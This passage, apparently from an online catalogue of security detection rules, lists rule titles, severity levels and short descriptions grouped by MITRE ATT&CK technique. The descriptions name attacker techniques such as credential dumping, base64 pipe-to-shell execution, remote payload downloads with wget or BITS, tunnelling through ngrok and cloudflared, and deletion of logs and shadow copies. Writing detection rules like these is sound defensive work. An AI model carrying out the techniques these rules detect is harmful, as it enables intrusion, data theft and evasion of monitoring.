    Description: Detects the use of "vim" and it's siblings commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
  • File and Directory Discovery - MacOS - Level: informational
    Description: Detects usage of system utilities to discover files and directories
  • Potential Discovery Activity Using Find - MacOS - Level: medium
    Description: Detects usage of "find" binary in a suspicious manner to perform discovery
  • Cisco Discovery - Level: low
    Description: Find information about network devices that is not stored in config files
  • Source Code Enumeration Detection by Keyword - Level: medium
    Description: Detects source code enumeration that use GET requests by keyword searches in URL strings
  • Powershell Sensitive File Discovery - Level: medium
    Description: Detect adversaries enumerate sensitive files
  • Powershell Directory Enumeration - Level: medium
    Description: Detects technique used by MAZE ransomware to enumerate directories using Powershell
  • DirLister Execution - Level: low
    Description: Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.
  • HackTool - PCHunter Execution - Level: high
    Description: Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff
  • PUA - Seatbelt Execution - Level: high
    Description: Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters
  • Turla Group Lateral Movement - Level: critical
    Description: Detects automated lateral movement by Turla group
  • WannaCry Ransomware Activity - Level: critical
    Description: Detects WannaCry ransomware activity
  • Automated Turla Group Lateral Movement - Level: medium
    Description: Detects automated lateral movement by Turla group
attack.t1548 21
Show Rules (21)
  • PrintNightmare Powershell Exploitation - Level: high
    Description: Detects Commandlet name for PrintNightmare exploitation.
  • AWS STS AssumeRole Misuse - Level: low
    Description: Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.
  • AWS STS GetSessionToken Misuse - Level: low
    Description: Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.
  • AWS Suspicious SAML Activity - Level: medium
    Description: Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.
  • CA Policy Removed by Non Approved Actor - Level: medium
    Description: Monitor and alert on conditional access changes where non approved actor removed CA Policy.
  • CA Policy Updated by Non Approved Actor - Level: medium
    Description: Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare "old" vs "new" value.
  • New CA Policy by Non-approved Actor - Level: medium
    Description: Monitor and alert on conditional access changes.
  • User Added To Group With CA Policy Modification Access - Level: medium
    Description: Monitor and alert on group membership additions of groups that have CA policy modification access
  • User Removed From Group With CA Policy Modification Access - Level: medium
    Description: Monitor and alert on group membership removal of groups that have CA policy modification access
  • GCP Break-glass Container Workload Deployed - Level: medium
    Description: Detects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls.
  • Linux Capabilities Discovery - Level: low
    Description: Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.
  • Linux Doas Conf File Creation - Level: medium
    Description: Detects the creation of doas.conf file in linux host platform.
  • Linux Doas Tool Execution - Level: low
    Description: Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.
  • SCM Database Privileged Operation - Level: medium
    Description: Detects non-system users performing privileged operation os the SCM database
  • Potential Privilege Escalation via Local Kerberos Relay over LDAP - Level: high
    Description: Detects a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, and the target user SID is the built-in local Administrator account. This may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined limited user to local System privileges.
  • Vulnerable Netlogon Secure Channel Connection Allowed - Level: high
    Description: Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.
  • Credential Dumping Attempt Via Svchost - Level: high
    Description: Detects when a process tries to access the memory of svchost to potentially dump credentials.
  • Regedit as Trusted Installer - Level: high
    Description: Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe
  • Abused Debug Privilege by Arbitrary Parent Processes - Level: high
    Description: Detection of unusual child processes by different system processes
  • UAC Bypass via Windows Firewall Snap-In Hijack - Level: medium
    Description: Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in
  • COM Hijack via Sdclt - Level: high
    Description: Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'
attack.t1090 21
Show Rules (21)
  • OpenCanary - HTTPPROXY Login Attempt - Level: high
    Description: Detects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page.
  • Malicious IP Address Sign-In Failure Rate - Level: high
    Description: Indicates sign-in from a malicious IP address based on high failure rates.
  • Malicious IP Address Sign-In Suspicious - Level: high
    Description: Indicates sign-in from a malicious IP address known to be malicious at time of sign-in.
  • Sign-In From Malware Infected IP - Level: high
    Description: Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server.
  • Communication To Ngrok Tunneling Service - Linux - Level: high
    Description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors
  • Communication To LocaltoNet Tunneling Service Initiated - Linux - Level: high
    Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
  • Connection Proxy - Level: low
    Description: Detects setting proxy configuration
  • Ngrok Usage with Remote Desktop Service - Level: high
    Description: Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour
  • Communication To LocaltoNet Tunneling Service Initiated - Level: high
    Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
  • Communication To Ngrok Tunneling Service Initiated - Level: high
    Description: Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
  • Suspicious TCP Tunnel Via PowerShell Script - Level: medium
    Description: Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity
  • Cloudflared Tunnel Connections Cleanup - Level: medium
    Description: Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections.
  • Cloudflared Tunnel Execution - Level: medium
    Description: Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.
  • HackTool - Htran/NATBypass Execution - Level: high
    Description: Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)
  • New Port Forwarding Rule Added Via Netsh.EXE - Level: medium
    Description: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule
  • RDP Port Forwarding Rule Added Via Netsh.EXE - Level: high
    Description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule
  • PUA - Fast Reverse Proxy (FRP) Execution - Level: high
    Description: Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.
  • PUA- IOX Tunneling Tool Execution - Level: high
    Description: Detects the use of IOX - a tool for port forwarding and intranet proxy purposes
  • PUA - NPS Tunneling Tool Execution - Level: high
    Description: Detects the use of NPS, a port forwarding and intranet penetration proxy server
  • Potentially Suspicious Usage Of Qemu - Level: medium
    Description: Detects potentially suspicious execution of the Qemu utility in a Windows environment. Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.
  • New PortProxy Registry Entry Added - Level: medium
    Description: Detects the modification of the PortProxy registry key which is used for port forwarding.
attack.t1070 20
Show Rules (20)
  • Suspicious Load of Advapi31.dll - Level: informational
    Description: Detects the load of advapi31.dll by a process running in an uncommon folder
  • Kubernetes Events Deleted - Level: medium
    Description: Detects when events are deleted in Kubernetes. An adversary may delete Kubernetes events in an attempt to evade detection.
  • SES Identity Has Been Deleted - Level: medium
    Description: Detects an instance of an SES identity being deleted via the "DeleteIdentity" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities
  • Linux Package Uninstall - Level: low
    Description: Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".
  • Remove Exported Mailbox from Exchange Webserver - Level: high
    Description: Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit
  • EventLog EVTX File Deleted - Level: medium
    Description: Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence
  • Exchange PowerShell Cmdlet History Deleted - Level: high
    Description: Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence
  • IIS WebServer Access Logs Deleted - Level: medium
    Description: Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence
  • PowerShell Console History Logs Deleted - Level: medium
    Description: Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence
  • Tomcat WebServer Logs Deleted - Level: medium
    Description: Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence
  • DLL Load By System Process From Suspicious Locations - Level: medium
    Description: Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"
  • Clearing Windows Console History - Level: high
    Description: Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.
  • Disable of ETW Trace - Powershell - Level: high
    Description: Detects usage of powershell cmdlets to disable or remove ETW trace sessions
  • Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE - Level: medium
    Description: Detects potential malicious and unauthorized usage of bcdedit.exe
  • Filter Driver Unloaded Via Fltmc.EXE - Level: medium
    Description: Detect filter driver unloading activity via fltmc.exe
  • Sysmon Driver Unloaded Via Fltmc.EXE - Level: high
    Description: Detects possible Sysmon filter driver unloaded via fltmc.exe
  • Fsutil Suspicious Invocation - Level: high
    Description: Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). Might be used by ransomwares during the attack (seen by NotPetya and others).
  • ETW Trace Evasion Activity - Level: high
    Description: Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.
  • Shadow Copies Deletion Using Operating Systems Utilities - Level: high
    Description: Shadow Copies deletion using operating systems utilities
  • Terminal Server Client Connection History Cleared - Registry - Level: high
    Description: Detects the deletion of registry keys containing the MSTSC connection history
attack.t1140 20
Show Rules (20)
  • Suspicious Certutil Command Usage - Level: high
    Description: Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code
  • Suspicious Inbox Forwarding Identity Protection - Level: high
    Description: Indicates suspicious rules such as an inbox rule that forwards a copy of all emails to an external address
  • Suspicious Inbox Manipulation Rules - Level: high
    Description: Detects suspicious rules that delete or move messages or folders are set on a user's inbox.
  • Linux Base64 Encoded Pipe to Shell - Level: medium
    Description: Detects suspicious process command line that uses base64 encoded input for execution with a shell
  • Linux Base64 Encoded Shebang In CLI - Level: medium
    Description: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded
  • Linux Shell Pipe to Shell - Level: medium
    Description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell
  • Payload Decoded and Decrypted via Built-in Utilities - Level: medium
    Description: Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.
  • Potential Base64 Decoded From Images - Level: high
    Description: Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.
  • PowerShell Decompress Commands - Level: informational
    Description: A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.
  • MSHTA Suspicious Execution 01 - Level: high
    Description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism
  • Ping Hex IP - Level: high
    Description: Detects a ping command that uses a hex encoded IP address
  • PowerShell Base64 Encoded FromBase64String Cmdlet - Level: high
    Description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
  • Base64 Encoded PowerShell Command Detected - Level: high
    Description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string
  • Suspicious XOR Encoded PowerShell Command - Level: medium
    Description: Detects presence of a potentially xor encoded powershell command
  • Potential Commandline Obfuscation Using Escape Characters - Level: medium
    Description: Detects potential commandline obfuscation using known escape characters
  • DNS-over-HTTPS Enabled by Registry - Level: medium
    Description: Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.
  • Potential BlackByte Ransomware Activity - Level: high
    Description: Detects command line patterns used by BlackByte ransomware in different operations
  • UNC4841 - SSL Certificate Exfiltration Via Openssl - Level: high
    Description: Detects the execution of "openssl" to connect to an IP address. This techniques was used by UNC4841 to exfiltrate SSL certificates and as a C2 channel with named pipes. Investigate commands executed in the temporal vicinity of this command.
  • UNC4841 - Download Compressed Files From Temp.sh Using Wget - Level: high
    Description: Detects execution of "wget" to download a ".zip" or ".rar" files from "temp.sh". As seen used by UNC4841 during their Barracuda ESG zero day exploitation.
  • UNC4841 - Download Tar File From Untrusted Direct IP Via Wget - Level: high
    Description: Detects execution of "wget" to download a "tar" from an IP address that doesn't have a trusted certificate. As seen used by UNC4841 during their Barracuda ESG zero day exploitation.
attack.t1127 19
Show Rules (19)
  • Remote Thread Creation Ttdinject.exe Proxy - Level: high
    Description: Detects a remote thread creation of Ttdinject.exe used as proxy
  • AspNetCompiler Execution - Level: medium
    Description: Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code.
  • Suspicious Child Process of AspNetCompiler - Level: high
    Description: Detects potentially suspicious child processes of "aspnet_compiler.exe".
  • Potentially Suspicious ASP.NET Compilation Via AspNetCompiler - Level: high
    Description: Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation.
  • Potential Binary Proxy Execution Via Cdb.EXE - Level: medium
    Description: Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file
  • Suspicious Use of CSharp Interactive Console - Level: high
    Description: Detects the execution of CSharp interactive console by PowerShell
  • C# IL Code Compilation Via Ilasm.EXE - Level: medium
    Description: Detects the use of "Ilasm.EXE" in order to compile C# intermediate (IL) code to EXE or DLL.
  • JScript Compiler Execution - Level: low
    Description: Detects the execution of the "jsc.exe" (JScript Compiler). Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting.
  • Kavremover Dropped Binary LOLBIN Usage - Level: high
    Description: Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.
  • Use of Remote.exe - Level: medium
    Description: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.
  • Use of TTDInject.exe - Level: medium
    Description: Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)
  • Use of VSIISExeLauncher.exe - Level: medium
    Description: The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries
  • Use of Wfc.exe - Level: medium
    Description: The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.
  • Potential Mftrace.EXE Abuse - Level: medium
    Description: Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries.
  • Detection of PowerShell Execution via Sqlps.exe - Level: medium
    Description: This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
  • SQL Client Tools PowerShell Session Detection - Level: medium
    Description: This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
  • Potential Arbitrary Code Execution Via Node.EXE - Level: high
    Description: Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc
  • Node Process Executions - Level: medium
    Description: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud
  • Microsoft Workflow Compiler Execution - Level: medium
    Description: Detects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
attack.t1482 18
Show Rules (18)
  • AzureHound PowerShell Commands - Level: high
    Description: Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound
  • Trickbot Malware Reconnaissance Activity - Level: high
    Description: Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.
  • Domain Trust Discovery - Level: medium
    Description: Detects a discovery of domain trusts.
  • Correct Execution of Nltest.exe - Level: high
    Description: The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions.
  • Potential Active Directory Reconnaissance/Enumeration Via LDAP - Level: medium
    Description: Detects potential Active Directory enumeration via LDAP
  • DNS Server Discovery Via LDAP Query - Level: low
    Description: Detects DNS server discovery via LDAP query requests from uncommon applications
  • BloodHound Collection Files - Level: high
    Description: Detects default file names outputted by the BloodHound collection tool SharpHound
  • Malicious PowerShell Commandlets - PoshModule - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Malicious PowerShell Commandlets - ScriptBlock - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Domain Trust Discovery Via Dsquery - Level: medium
    Description: Detects execution of "dsquery.exe" for domain trust discovery
  • HackTool - Bloodhound/Sharphound Execution - Level: high
    Description: Detects command line parameters used by Bloodhound and Sharphound hack tools
  • HackTool - SharpView Execution - Level: high
    Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
  • HackTool - TruffleSnout Execution - Level: high
    Description: Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.
  • Nltest.EXE Execution - Level: low
    Description: Detects nltest commands that can be used for information discovery
  • Potential Recon Activity Via Nltest.EXE - Level: medium
    Description: Detects nltest commands that can be used for information discovery
  • Malicious PowerShell Commandlets - ProcessCreation - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • PUA - AdFind Suspicious Execution - Level: high
    Description: Detects AdFind execution with common flags seen used during attacks
  • Renamed AdFind Execution - Level: high
    Description: Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.
attack.t1087 18
Show Rules (18)
  • AzureHound PowerShell Commands - Level: high
    Description: Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound
  • CrackMapExecWin - Level: critical
    Description: Detects CrackMapExecWin Activity as Described by NCSC
  • SharpHound Recon Account Discovery - Level: high
    Description: Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.
  • Hacktool Ruler - Level: high
    Description: This events that are generated when using the hacktool Ruler by Sensepost
  • Uncommon Connection to Active Directory Web Services - Level: medium
    Description: Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.
  • Malicious PowerShell Commandlets - PoshModule - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Malicious PowerShell Commandlets - ScriptBlock - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • HackTool - SOAPHound Execution - Level: high
    Description: Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.
  • HackTool - winPEAS Execution - Level: high
    Description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz
  • Network Reconnaissance Activity - Level: high
    Description: Detects a set of suspicious network related commands often used in recon stages
  • Malicious PowerShell Commandlets - ProcessCreation - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • PUA - Seatbelt Execution - Level: high
    Description: Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters
  • Suspicious Use of PsLogList - Level: medium
    Description: Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs
  • Chopper Webshell Process Pattern - Level: high
    Description: Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells
  • Webshell Hacking Activity Patterns - Level: high
    Description: Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system
  • Webshell Detection With Command Line Keywords - Level: high
    Description: Detects certain command line parameters often used during reconnaissance activity via web shells
  • Potential Pikabot Discovery Activity - Level: high
    Description: Detects system discovery activity carried out by Pikabot, such as incl. network, user info and domain groups. The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute).
  • Reconnaissance Activity Using BuiltIn Commands - Level: medium
    Description: Detects execution of a set of builtin commands often used in recon stages by different attack groups
attack.t1197 18
Show Rules (18)
  • Suspicious Bitsadmin Job via PowerShell - Level: high
    Description: Detect download by BITS jobs via PowerShell
  • Suspicious Bitstransfer via PowerShell - Level: medium
    Description: Detects transferring files from system on a server bitstransfer Powershell cmdlets
  • Bitsadmin to Uncommon IP Server Address - Level: high
    Description: Detects Bitsadmin connections to IP addresses instead of FQDN names
  • Bitsadmin to Uncommon TLD - Level: high
    Description: Detects Bitsadmin connections to domains with uncommon TLDs
  • New BITS Job Created Via Bitsadmin - Level: low
    Description: Detects the creation of a new bits job by Bitsadmin
  • New BITS Job Created Via PowerShell - Level: low
    Description: Detects the creation of a new bits job by PowerShell
  • BITS Transfer Job Downloading File Potential Suspicious Extension - Level: medium
    Description: Detects new BITS transfer job saving local files with potential suspicious extensions
  • BITS Transfer Job Download From File Sharing Domains - Level: high
    Description: Detects BITS transfer job downloading files from a file sharing domain.
  • BITS Transfer Job Download From Direct IP - Level: high
    Description: Detects a BITS transfer job downloading file(s) from a direct IP address.
  • BITS Transfer Job With Uncommon Or Suspicious Remote TLD - Level: medium
    Description: Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.
  • BITS Transfer Job Download To Potential Suspicious Folder - Level: high
    Description: Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location
  • Suspicious Download From Direct IP Via Bitsadmin - Level: high
    Description: Detects usage of bitsadmin downloading a file using an URL that contains an IP
  • File Download Via Bitsadmin - Level: medium
    Description: Detects usage of bitsadmin downloading a file
  • Suspicious Download From File-Sharing Website Via Bitsadmin - Level: high
    Description: Detects usage of bitsadmin downloading a file from a suspicious domain
  • File With Suspicious Extension Downloaded Via Bitsadmin - Level: high
    Description: Detects usage of bitsadmin downloading a file with a suspicious extension
  • File Download Via Bitsadmin To A Suspicious Target Folder - Level: high
    Description: Detects usage of bitsadmin downloading a file to a suspicious target folder
  • File Download Via Bitsadmin To An Uncommon Target Folder - Level: medium
    Description: Detects usage of bitsadmin downloading a file to uncommon target folder
  • Monitoring For Persistence Via BITS - Level: medium
    Description: BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded.
attack.t1216 17
Show Rules (17)
  • Execution via CL_Invocation.ps1 - Powershell - Level: high
    Description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module
  • Execution via CL_Mutexverifiers.ps1 - Level: high
    Description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module
  • AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File - Level: medium
    Description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)
  • Suspicious CustomShellHost Execution - Level: medium
    Description: Detects the execution of CustomShellHost binary where the child isn't located in 'C:\Windows\explorer.exe'
  • Potential Manage-bde.wsf Abuse To Proxy Execution - Level: high
    Description: Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution
  • Execute Code with Pester.bat as Parent - Level: medium
    Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
  • Execute Code with Pester.bat - Level: medium
    Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
  • SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code - Level: medium
    Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs
  • UtilityFunctions.ps1 Proxy Dll - Level: medium
    Description: Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.
  • Potential Process Execution Proxy Via CL_Invocation.ps1 - Level: medium
    Description: Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process"
  • Assembly Loading Via CL_LoadAssembly.ps1 - Level: medium
    Description: Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls.
  • Potential Script Proxy Execution Via CL_Mutexverifiers.ps1 - Level: medium
    Description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands
  • Uncommon Sigverif.EXE Child Process - Level: medium
    Description: Detects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution.
  • AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - Level: medium
    Description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)
  • Remote Code Execute via Winrm.vbs - Level: medium
    Description: Detects an attempt to execute code or create service on remote host via winrm.vbs.
  • Execution via CL_Invocation.ps1 (2 Lines) - Level: high
    Description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module
  • Execution via CL_Mutexverifiers.ps1 (2 Lines) - Level: high
    Description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module
attack.t1572 17
Show Rules (17)
  • Communication To Ngrok Tunneling Service - Linux - Level: high
    Description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors
  • Communication To LocaltoNet Tunneling Service Initiated - Linux - Level: high
    Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
  • Communication To LocaltoNet Tunneling Service Initiated - Level: high
    Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
  • Communication To Ngrok Tunneling Service Initiated - Level: high
    Description: Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
  • RDP Over Reverse SSH Tunnel - Level: high
    Description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
  • RDP to HTTP or HTTPS Target Ports - Level: high
    Description: Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
  • Silence.EDA Detection - Level: critical
    Description: Detects Silence EmpireDNSAgent as described in the Group-IP report
  • Cloudflared Tunnel Connections Cleanup - Level: medium
    Description: Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections.
  • Cloudflared Tunnel Execution - Level: medium
    Description: Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.
  • Suspicious Plink Port Forwarding - Level: high
    Description: Detects suspicious Plink tunnel port forwarding to a local port
  • Potential RDP Tunneling Via Plink - Level: high
    Description: Execution of plink to perform data exfiltration and tunneling
  • PUA - 3Proxy Execution - Level: high
    Description: Detects the use of 3proxy, a tiny free proxy server
  • PUA - Ngrok Execution - Level: high
    Description: Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available. Involved domains are bin.equinox.io for download and *.ngrok.io for connections.
  • Potentially Suspicious Usage Of Qemu - Level: medium
    Description: Detects potentially suspicious execution of the Qemu utility in a Windows environment. Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.
  • Port Forwarding Activity Via SSH.EXE - Level: medium
    Description: Detects port forwarding activity via SSH.exe
  • Potential RDP Tunneling Via SSH - Level: high
    Description: Execution of ssh.exe to perform data exfiltration and tunneling through RDP
  • Tunneling Tool Execution - Level: medium
    Description: Detects the execution of well known tools that can be abused for data exfiltration and tunneling.
attack.t1528 16
Show Rules (16)
  • iOS Implant URL Pattern - Level: critical
    Description: Detects URL pattern used by iOS Implant
  • Suspicious File Event With Teams Objects - Level: high
    Description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
  • Delegated Permissions Granted For All Users - Level: high
    Description: Detects when highly privileged delegated permissions are granted on behalf of all users
  • End User Consent - Level: low
    Description: Detects when an end user consents to an application
  • End User Consent Blocked - Level: medium
    Description: Detects when end user consent is blocked due to risk-based consent.
  • App Granted Microsoft Permissions - Level: high
    Description: Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD
  • Application URI Configuration Changes - Level: high
    Description: Detects when a configuration change is made to an applications URI. URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.
  • Anomalous Token - Level: high
    Description: Indicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar location.
  • Anonymous IP Address - Level: high
    Description: Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN.
  • Primary Refresh Token Access Attempt - Level: high
    Description: Indicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft
